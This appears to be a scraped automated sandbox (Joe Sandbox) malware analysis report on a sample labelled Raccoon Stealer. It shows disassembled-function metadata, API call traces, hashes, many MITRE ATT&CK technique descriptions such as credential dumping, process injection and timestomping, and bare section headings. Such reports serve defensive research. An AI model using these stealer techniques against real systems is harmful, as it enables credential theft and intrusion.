Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memset
String ID: DLL search path passed in externally: %ws$LdrpInitializeDllPath$minkernel\ntdll\ldrutil.c
API String ID: 2221118986-109579469
Opcode ID: 5bff814777b3af08b1863a7c2d613d8475ae53154b493ba3370f6a450f56461a
Instruction ID: 1498bb6afafab24806baced3ad1f648f12b5419f503659c562499154756161fe
Opcode Fuzzy Hash: 5bff814777b3af08b1863a7c2d613d8475ae53154b493ba3370f6a450f56461a
Instruction Fuzzy Hash: 33F046727843457BF3211A0E9C41F627BD9DBA0329F18462FFE90262C2CBB1E8108A95

Uniqueness

Uniqueness Score: -1.00%

Function 72716325, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 72688EA0: RtlInitUnicodeString.210A(00000104,\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,?,?,?,?,?,?,?,?,?,72716368,?,00000104,?), ref: 72688EB2
Part of subcall function 72688EA0: ZwOpenKey.210A(?,00020019,00000018,00000104,\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,?,?), ref: 72688EED
Part of subcall function 72688EA0: RtlAllocateHeap.210A(?,00000008,?,?,?,00020019,00000018,00000104,\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,?,?), ref: 72688F3E
Part of subcall function 72688EA0: RtlInitUnicodeString.210A(72716368,BuildLabEx,?,?,?,00020019,00000018,00000104,\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,?,?), ref: 72688F4E
Part of subcall function 72688EA0: ZwQueryValueKey.210A(?,72716368,00000002,00000000,?,?,72716368,BuildLabEx,?,?,?,00020019,00000018,00000104,\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion,?), ref: 72688F63
Part of subcall function 72688EA0: RtlFreeHeap.210A(?,00000000,00000000,?,72716368,00000002,00000000,?,?,72716368,BuildLabEx,?,?,?,00020019,00000018), ref: 72688F7E
Part of subcall function 72688EA0: ZwClose.210A(?,?,?,?,00020019,00000018,00000104,\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,?,?), ref: 72688F86

RtlUnicodeToMultiByteN.210A(?,00000104,00000000,?,00000208,?,00000104,?,?,?), ref: 72716386

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 7271635E
BuildLabEx, xrefs: 72716350

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Unicode$HeapInitString$AllocateByteCloseFreeMultiOpenQueryValue
String ID: BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1598178305-207245706
Opcode ID: 7a96ce985bce2188b6cf5475eeb6f73ac8a24b2321817877c99c342d6eb2754f
Instruction ID: 0892837c97c972e0fb5d38ca5f4ad960e3c8f3516fbb66a4334907d18133d2eb
Opcode Fuzzy Hash: 7a96ce985bce2188b6cf5475eeb6f73ac8a24b2321817877c99c342d6eb2754f
Instruction Fuzzy Hash: F731967260011D5BD715CE68DE81EEA77BDEF84318F5042AEEA15D7181E630EF49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 726896CC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,00000000,?,00000000,00000000), ref: 726896EE
RtlCreateUnicodeString.210A(?,?,?,00000000,?,00000000,00000000), ref: 72689710

Part of subcall function 7267EC20: memcpy.210A(00000000,00000050,00000000,00000000,7271FC98,0000000C,72659698,?,?,00000000,000000FC,?,00000000,00000050,?), ref: 7267EC79

Strings

%s_%d, xrefs: 726C0B22

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$CreateInitmemcpy
String ID: %s_%d
API String ID: 1567783287-1933919280
Opcode ID: 7846b9897fff00211eba85e228a07c6ba1887eb898904ec5ec9da3aa5aa88572
Instruction ID: 28b4b663aa488bbd40fa6814d85606389dcba8f5ba0a0adbff2a114e1c6ccf8d
Opcode Fuzzy Hash: 7846b9897fff00211eba85e228a07c6ba1887eb898904ec5ec9da3aa5aa88572
Instruction Fuzzy Hash: D811E7B5600208ABD714EE2CCD80FA677BCEB44300F1044A7EA45DB2C5FA71EE4587A4

Uniqueness

Uniqueness Score: -1.00%

Function 7264B7EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

wcschr.210A(?,0000005C,?,?,7264B7BD), ref: 7264B7F5
RtlQueryEnvironmentVariable.210A(00000000,NoDefaultCurrentDirectoryInExePath,00000022,00000000,00000000,?,?,?,7264B7BD), ref: 7264B810

Part of subcall function 72670430: RtlEnterCriticalSection.210A(?,7271F8F0,00000020,7266FFBC,?,?,?,?,?,?,00000000,0000000E,00000000), ref: 726704A9

Strings

NoDefaultCurrentDirectoryInExePath, xrefs: 7264B80A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalEnterEnvironmentQuerySectionVariablewcschr
String ID: NoDefaultCurrentDirectoryInExePath
API String ID: 2453918015-3502530895
Opcode ID: 9564f85e25f6fa63c81028d3ced8d16f64baef4164ce20d1ecc58b24a4f6d7f9
Instruction ID: 910b3842a14c726f9d14df0cd12041d7d7eb0b2a8cd1abf2f2066b91962ec4b7
Opcode Fuzzy Hash: 9564f85e25f6fa63c81028d3ced8d16f64baef4164ce20d1ecc58b24a4f6d7f9
Instruction Fuzzy Hash: C3E02CA1A002083EFA2489A8EC02EB33B8CC301320F102957F980CA0C0EDA6DD0040A4

Uniqueness

Uniqueness Score: -1.00%

Function 726834D8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(727384D8,?,apphelp.dll,00000000,72669AD7,?,00000000,?,?,apphelp.dll,?,?,7271F730,00000020,72659DE3,000014A8), ref: 726834E7
RtlReleaseSRWLockExclusive.210A(727384D8,727384D8,?,apphelp.dll,00000000,72669AD7,?,00000000,?,?,apphelp.dll,?,?,7271F730,00000020,72659DE3), ref: 72683508

Strings

apphelp.dll, xrefs: 726834DB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: apphelp.dll
API String ID: 17069307-573373394
Opcode ID: 45d39281146c28f27b5c40f04018179e614378e4e1319226c3e3fb37bf977458
Instruction ID: bc93cfc3d174da53717aebdd11c2f62059b5c2a6180f4b84037f6514d256cdad
Opcode Fuzzy Hash: 45d39281146c28f27b5c40f04018179e614378e4e1319226c3e3fb37bf977458
Instruction Fuzzy Hash: 42E0D8722002404BD7219A2EC844A2FBFDA9FD163DF2945ABE0174B1D2CBB6DC13C762

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report y98WYYcJ2U.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 00415AB0, Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 330
stringpipetimeCOMMON

Function 001D003C, Relevance: 25.0, APIs: 12, Strings: 2, Instructions: 515
libraryloadermemoryCOMMON

Function 00401758, Relevance: 3.1, APIs: 2, Instructions: 114
COMMON

Function 0040182B, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Function 00401837, Relevance: 3.0, APIs: 2, Instructions: 41
sleepnativeCOMMON

Function 00401856, Relevance: 3.0, APIs: 2, Instructions: 38
sleepnativeCOMMON

Function 0040184B, Relevance: 3.0, APIs: 2, Instructions: 37
sleepnativeCOMMON

Function 004017DA, Relevance: 1.6, APIs: 1, Instructions: 62
nativeCOMMON

Function 00415C29, Relevance: 18.2, APIs: 12, Instructions: 234
memoryCOMMON

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre